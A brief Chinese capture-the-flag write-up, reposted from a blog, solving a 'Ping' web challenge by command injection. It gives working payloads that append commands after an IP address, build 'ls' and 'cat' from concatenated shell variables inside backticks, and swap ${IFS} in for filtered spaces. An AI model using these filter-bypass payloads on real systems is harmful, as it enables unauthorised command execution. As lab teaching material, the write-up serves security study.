ctf-ping命令执行绕过

题目连接：http://ctf.klmyssn.com/challenges#Ping

 

命令执行绕过，试了试过滤了一些：一些命令

但是反引号可以执行命令

 

通过拼接，可以拼接出来：ls 命令

127.0.0.1;`a="l";b="s";c=$a$b;$c`

 

 

可以发现 flag 就是下面那一串 flag_ 开头的字符串

 

在拼接命令来查看：

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

针对空格过滤，可以使用：

${IFS}

<  （也被过滤了）

$IFS

$IFS$9

来代替，但是考虑到在一串字符串中，所以使用 ${IFS} 来代替空格

 

转载于:https://www.cnblogs.com/-chenxs/p/11495607.html